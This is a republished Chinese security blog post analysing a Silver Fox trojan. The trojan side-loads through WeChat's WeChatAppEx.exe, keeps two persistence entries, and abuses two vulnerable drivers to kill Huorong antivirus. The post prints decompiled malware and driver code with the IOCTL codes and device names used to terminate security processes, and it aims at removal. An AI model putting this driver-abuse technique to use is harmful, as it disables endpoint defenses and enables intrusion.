白利用微信的 WeChatAppEx.exe

admin 2026-09-13 05:26:38 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文分析银狐木马利用微信WeChatAppEx.exe的xweb_elf.dll进行白利用,创建两个启动项并注入svchost服务DLL,通过两个漏洞驱动(PoisonKiller和gofly64.sys)终止火绒进程并创建组策略禁止其运行。建议使用专杀工具处理后重启,确保火绒正常启动。 综合评分: 75 文章分类: 恶意软件,漏洞分析,应急响应,红队,免杀


白利用微信的 WeChatAppEx.exe

原创

wowocock wowocock

无名小筑的奇妙旅程

2026年8月5日 18:20 北京

在小说阅读器读本章

去阅读

在公众号小说中沉浸阅读

任务 P26041000051,P26041000006

发现新的银狐木马,全程过火绒,并将火绒干掉,重启火绒无法启动。

白利用微信的 WeChatAppEx.exe的xweb_elf.dll

木马生成了2个启动项,只要任意一个没干掉,都不影响木马的运行。

不过只要干掉木马的DLL,就都失效了。

1,白利用计划任务

2注入到 svc host里的服务DLL

所以需要同时干掉这2启动项个才行。

同时木马启动时会创建组策略来禁止火绒运行,所以需要专杀专门处理下,否则火绒无法运行。木马运行的时候,即使启动了火绒,木马也会利用内部的漏洞驱动杀掉火绒

木马DLL一共利用2个漏洞驱动杀杀软,一个是https://github.com/j3h4ck/PoisonKiller/ dwIoControlCode = 0x22E010;   sub_180018948(&lpFileName, L”\\.\{F8284233-48F4-4680-ADDD-F8284233}”);   v0 = sub_18001CA64(v16, 5i64);   v1 = sub_180023D40(v20);   v2 = sub_180001948(v19, v1, L”drv_”);   LOBYTE(v3) = v21;   sub_18000A08C(v17, v3, v2, v0);   v4 = sub_180001948(v18, v17, L”.sys”);   if ( &xmmword_1800A8C48 != (__int128 *)v4 )   {     sub_180004C64(&xmmword_1800A8C48);     xmmword_1800A8C48 = *(_OWORD *)v4;     xmmword_1800A8C58 = *(_OWORD *)(v4 + 16);     *(_QWORD *)(v4 + 16) = 0i64;     *(_QWORD *)(v4 + 24) = 7i64;     *(_WORD *)v4 = 0;   }   sub_180004C64(v18);   sub_180004C64(v17);   sub_180004C64(v19);   sub_180004C64(v20);   sub_180004C64(v16);

  还有一个是南京偲言睿网络科技有限公司的gofly64.sys if ( !(unsigned int)sub_1800228D0(“HipsTray.exe”) )   {     dword_1800AA784 = 0;     dwIoControlCode = 0x12227A;     sub_180018948(&lpFileName, L”\\.\GoFly”);     v7 = sub_18001CA64(v18, 5i64);     v8 = sub_180023D40(v19);     v9 = sub_180001948(v20, v8, L”drv_”);     LOBYTE(v10) = v21;     sub_18000A08C(v17, v10, v9, v7);     v11 = sub_180001948(v16, v17, L”.sys”);     if ( &xmmword_1800A8C48 != (__int128 *)v11 )     {       if ( *((_QWORD *)&xmmword_1800A8C58 + 1) > 7ui64 )       {         v12 = (void *)xmmword_1800A8C48;         if ( (unsigned __int64)(2i64 * *((_QWORD *)&xmmword_1800A8C58 + 1) + 2) >= 0x1000 )         {           if ( (unsigned __int64)(xmmword_1800A8C48 – *(_QWORD *)(xmmword_1800A8C48 – 8) – 8) > 0x1F )           {             sub_18002F204(0i64, 0i64, 0i64, 0i64, 0i64);             goto LABEL_24;           }           v12 = *(void **)(xmmword_1800A8C48 – 8);         }         sub_18002916C(v12);       } 对应驱动 else if ( v27 == 0x12227A )       {         if ( Src )         {           if ( MaxCount >= 4ui64 )           {             v53 = (HANDLE)sub_140006D68(*(_DWORD *)&Src->Type);             if ( v53 != PsGetCurrentProcessId() )             {               ProcessHandle = 0i64;               ClientId.UniqueProcess = (HANDLE)sub_140006D68(*(_DWORD *)&Src->Type);               ClientId.UniqueThread = 0i64;               ObjectAttributes.Length = 48;               memset(&ObjectAttributes.RootDirectory, 0, 20);               ObjectAttributes.SecurityDescriptor = 0i64;               ObjectAttributes.SecurityQualityOfService = 0i64;               v11 = ZwOpenProcess(&ProcessHandle, 1u, &ObjectAttributes, &ClientId);               if ( v11 >= 0 )               {                 ZwTerminateProcess(ProcessHandle, 0);                 ZwClose(ProcessHandle);               }             }           }         }       }

目标是:

运行专杀处理后,重启,火绒能正常启动。


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:无名小筑的奇妙旅程 wowocock wowocock《白利用微信的 WeChatAppEx.exe》

评论:0   参与:  0